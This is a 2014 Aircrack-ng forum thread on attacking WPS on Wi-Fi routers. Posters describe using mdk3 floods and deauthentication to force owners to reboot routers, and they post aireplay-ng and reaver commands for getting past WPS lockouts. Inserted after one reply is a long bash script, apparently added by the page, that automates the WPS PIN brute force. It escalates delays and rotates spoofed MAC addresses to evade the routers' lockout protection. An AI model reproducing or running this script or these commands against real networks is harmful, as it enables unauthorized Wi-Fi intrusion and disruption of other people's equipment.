Aircrack-ng forum


Author Topic: Aircrack-NG WPS attacks  (Read 30304 times)

some123

Aircrack-NG WPS attacks
« on: January 18, 2014, 09:44:52 am »

Hey all (:

Will aircrack-ng ever 'do' WPS attacks? If not, is there a reason why?

E.g. what reaver & bully does?
https://code.google.com/p/reaver-wps/
https://github.com/bdpurcell/bully


Have a good one, y'all!

misterx (Aircrack-ng Author, Administrator)
Re: Aircrack-NG WPS attacks
« Reply #1 on: January 18, 2014, 08:07:03 pm »

I don't know.

A while ago, the author of Reaver talked to me about integrating it into aircrack-ng, so I created him a username on trac and svn, but he never did anything and he never asked me any question. I might have asked him if he needed help (but I'm not sure), and he never said anything.

some123

Re: Aircrack-NG WPS attacks
« Reply #2 on: January 19, 2014, 02:25:08 pm »

reaver hasn't been updated since Jan 2012 - it looks like the project has gone dark.

Would asking the bully guys be better (as that's currently being worked on)?

pedropt

Re: Aircrack-NG WPS attacks
« Reply #3 on: August 28, 2014, 07:39:02 pm »

WPS protections have been upgraded a lot by router brands.
It is getting more and more difficult each time to crack a WPS wifi router.
Sometimes it will take more than 3 months to crack a WPS router, because some of them block any WPS access for 24h after 3 tries, and some of them even block all WPS attempts until the next modem/router reboot after 3 tries.
The future of WPS attacking will be a mix of MDK, bully and aircrack.
Example:
If WPS is blocked for more than 60 seconds, then an mdk command must be used automatically in order to force a modem reboot.
But even that will look very suspicious to the owner, watching his/her equipment go off every 3 minutes.

open

Re: Aircrack-NG WPS attacks
« Reply #4 on: September 01, 2014, 02:05:36 pm »

Quote
If WPS is blocked for more than 60 seconds, then an mdk command must be used automatically in order to force a modem reboot.
I would be very curious to test this approach on my router.
Could you please share with us the sequence of commands (mdk, and others) to force a modem reboot?
Thank you

open

Re: Aircrack-NG WPS attacks
« Reply #5 on: September 06, 2014, 10:29:34 am »

Did a few tests.
reaver and bully are both bugged with the same bug: they keep flooding the AP with association and authorization frames no matter what the AP answers, which results in deauthentication.
I found some videos on YouTube about using mdk3 to reset the modem, and tried them on my top-edge shining brand-new router: WPS gets locked after 5 tries, and no mdk3 can unlock or reset the router, no matter how long I keep running mdk3.
New WPS routers are invulnerable, sorry 8)

p.s. found out the reaver author is selling a new version for money... what a waste
« Last Edit: September 06, 2014, 10:40:01 am by open »

pedropt

Re: Aircrack-NG WPS attacks
« Reply #6 on: September 14, 2014, 07:50:08 am »

Quote
I found some videos on YouTube about using mdk3 to reset the modem, and tried them on my top-edge shining brand-new router: WPS gets locked after 5 tries, and no mdk3 can unlock or reset the router, no matter how long I keep running mdk3.
New WPS routers are invulnerable, sorry
lol, that depends on your signal to the AP.
If you have -50dB to -60dB then you are able to reboot it.
It is not just one command in mdk to shut down the AP; multiple attacks must be used at the same time to take effect.
It also depends on the power of your wireless card.
There are also other ways to reboot the AP without mdk3: you just need to send de-authentication packets to the clients so they cannot get a stable connection to the AP; after that the owner of the AP will think the AP is jammed and will eventually reboot the router manually.

It looks like someone made a tool for offline cracking of WPS,
but he will not share it.

http://arstechnica.com/security/2014/08/offline-attack-shows-wi-fi-routers-still-vulnerable/

There is also already a script that uses mdk and reaver to try to hack difficult WPS protections; it is called revdk3

http://forum.top-hat-sec.com/index.php?topic=4646.0
« Last Edit: September 14, 2014, 07:58:37 am by pedropt »

tan112

Re: Aircrack-NG WPS attacks
« Reply #7 on: September 23, 2014, 05:55:49 pm »

Quote
lol, that depends on your signal to the AP.
You gotta be kidding! All the newest APs are invulnerable to WPS attacks!
Only look at my WRT160Nv3; it is not even so new, but it is absolutely INVULNERABLE to any freaking mdk attacks or reaver or bully or whatever attack you can invent! I tried all ways, none worked! It even suffers from that famous "bug" which is not a bug, it is normal behavior: you don't want WPS? Only send a few WPS tries and you are done, WPS gets disabled completely; you need to factory-reset the AP to get WPS back again! Not even on/off gets WPS back!

Now I dare you: find me a way to crack WPS or just force a reboot on any model of WRT160N,
and I will suck your d* ;)

pedropt

Re: Aircrack-NG WPS attacks
« Reply #8 on: September 23, 2014, 06:56:52 pm »

No, please don't. ;)
Interesting fact you are writing.
I never got an AP that worked that way, and it is interesting that the user must know how to get into the router configuration page to re-enable WPS again!!!
Maybe some new protections on new devices.
What mdk does is flood the router with packets that jam the software inside, and the router is forced to reboot.
Catch the handshake and put it online for decoding at: http://wpa.darkircop.org/
Maybe you get lucky and the owner did not change the default password.
I really hope I get one of those online one day to test here.
I love challenges.

tan112

Re: Aircrack-NG WPS attacks
« Reply #9 on: September 24, 2014, 06:57:11 am »

The WRT160N is mine and I did change the default password, which of course is not inside any of those stupid password collections on the net! When you find a router with a MAC such as 68:7F:74:x:x:x, you will understand how hopeless and miserable the life is of those individuals who call themselves "hackers" ;)

pedropt

Re: Aircrack-NG WPS attacks
« Reply #10 on: September 24, 2014, 09:44:26 am »

ehehehehe.
Do you give me authorization to scan your IP?
If yes, then send me your IP as a PM; I want to have a look from the outside world.
You can get your IP from ip-secrets.com.
I will send you the results in a PM.
Note: the curiosity about the scan is due to the fact that the wireless side is so protected that I will be surprised if they made an optimal firmware without a backdoor left open.
« Last Edit: September 25, 2014, 07:09:35 pm by pedropt »

pedropt

Re: Aircrack-NG WPS attacks
« Reply #11 on: November 09, 2014, 08:13:43 pm »

I am testing some routers with that issue.
The cause of that is that routers do not allow brute-force attacks.
This particular router I am testing blocks WPS requests after 3 attempts, then only after 60 seconds allows 3 more tries, and after that blocks WPS until the next reboot.
Also, this particular router does not allow reaver associations.
Until now I have been able to get through with WPS requests in reaver this way:

association with aireplay:
aireplay-ng -1 20 -a xx:xx:xx:xx:xx:xx mon0

and then with this particular command in reaver:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c x -A -N -E -vv -d 60

If you receive a timeout even with this delay, then you must increase the delay further.
Instead of 60, use 70.

I also tested a router that blocked WPS with the same protections, but this one did not allow your MAC address again.
And since you cannot make an association with reaver, I need to put down mon0, change the MAC address and start everything again with aireplay and reaver.

I like these challenges because we happen to learn a lot from new WPS protections.
Maybe I will create a thread specifically on some techniques that can be used in WPS attacks.

The most important thing in the attack is a good signal to the AP, at least -65dBm.
« Last Edit: November 15, 2014, 10:17:57 am by pedropt »
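The procedure in the post above (fake association with aireplay-ng, reaver with -A so it does not associate itself, raise -d on a timeout, and swap the MAC when the AP stops accepting it) can be turned into a loop. The script below is an added example written for this page; it is not code from the thread or from the aircrack-ng or reaver projects. Everything beyond the two commands quoted in the post is an assumption: that reaver accepts -m to set its source MAC, that it prints "Detected AP rate limiting" when it sees a lockout and "Receive timeout occurred" on a timeout (check both strings against the reaver build you have), and that the driver lets ip(8) re-address the monitor interface. The constructed log lines in the comments are illustrations, not captured reaver output.

```shell
#!/usr/bin/env bash
# Lockout-aware wrapper around the aireplay-ng + reaver procedure from the post.
# Example code for this page, not from aircrack-ng or reaver. Assumptions:
# reaver has -m, prints the two WARNING strings matched below, and the driver
# accepts "ip link set ... address" on the monitor interface.
set -u

IFACE="${IFACE:-mon0}"        # monitor-mode interface
CHANNEL="${CHANNEL:-6}"       # AP channel, reaver -c
MAX_LOCKS="${MAX_LOCKS:-2}"   # lockouts tolerated before rotating the MAC
LOG="${LOG:-reaver-wrapper.log}"

# Timeout handling as described in the post: raise the -d delay by 10 s.
next_delay() { echo $(( $1 + 10 )); }

# Random locally-administered unicast MAC: bit 1 of byte 0 set, bit 0 clear,
# so a rotated address never impersonates a real vendor OUI.
random_laa_mac() {
  set -- $(od -An -tu1 -N6 /dev/urandom)
  printf '%02x:%02x:%02x:%02x:%02x:%02x\n' \
    $(( ($1 & 0xfc) | 0x02 )) "$2" "$3" "$4" "$5" "$6"
}

# Classify one line of "reaver -vv" output (pattern strings are assumptions,
# e.g. constructed line: "[!] WARNING: Detected AP rate limiting, waiting 60 seconds").
classify_reaver_line() {
  case "$1" in
    *"Detected AP rate limiting"*) echo lock ;;
    *"Receive timeout occurred"*)  echo timeout ;;
    *"WPS PIN:"*)                  echo pin ;;
    *)                             echo other ;;
  esac
}

# The "put down mon0, change the MAC" step from the post.
rotate_mac() {
  local mac; mac=$(random_laa_mac)
  ip link set dev "$IFACE" down
  ip link set dev "$IFACE" address "$mac"
  ip link set dev "$IFACE" up
  echo "$mac"
}

# One round: keep the fake association alive with aireplay-ng (-1 20 re-auths
# every 20 s) and run reaver on top of it with -A. Exit codes:
# 0 PIN found, 2 too many lockouts, 3 receive timeout, 1 anything else.
wps_round() {
  local bssid=$1 mac=$2 delay=$3 rc
  aireplay-ng -1 20 -a "$bssid" -h "$mac" "$IFACE" >/dev/null 2>&1 &
  local aireplay_pid=$!
  reaver -i "$IFACE" -b "$bssid" -c "$CHANNEL" -m "$mac" -A -N -E -vv -d "$delay" 2>&1 \
    | tee -a "$LOG" \
    | { locks=0
        while IFS= read -r line; do
          case "$(classify_reaver_line "$line")" in
            pin)     exit 0 ;;
            timeout) exit 3 ;;
            lock)    locks=$((locks + 1)); [ "$locks" -ge "$MAX_LOCKS" ] && exit 2 ;;
          esac
        done
        exit 1; }
  rc=${PIPESTATUS[2]}
  kill "$aireplay_pid" 2>/dev/null
  pkill -x reaver 2>/dev/null   # reader exited early; stop the producer too
  return "$rc"
}

main() {
  local bssid=$WPS_BSSID mac delay=60 rc
  mac=$(rotate_mac)
  while :; do
    if wps_round "$bssid" "$mac" "$delay"; then rc=0; else rc=$?; fi
    case $rc in
      0) echo "PIN recovered, see $LOG"; return 0 ;;
      3) delay=$(next_delay "$delay"); echo "timeout: delay now ${delay}s" ;;
      2) mac=$(rotate_mac); echo "WPS locked: rotated MAC to $mac" ;;
      *) echo "reaver exited ($rc)"; return "$rc" ;;
    esac
  done
}

# Only attack when a target is given: WPS_BSSID=xx:xx:xx:xx:xx:xx CHANNEL=6 ./wrapper.sh
if [ -n "${WPS_BSSID:-}" ]; then main; fi
```

Run it as root on a monitor-mode interface with WPS_BSSID set to the target, and expect nothing more than the post promises: a router that locks until the next reboot after the second window will simply cycle through MAC rotations, and a router that keys its lockout on the attacking MAC is the only case where rotate_mac buys another window.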

misterx (Aircrack-ng Author, Administrator)
Re: Aircrack-NG WPS attacks
« Reply #12 on: December 17, 2014, 03:12:02 am »

That would be great. Let me know when you do it, so I can make the thread sticky.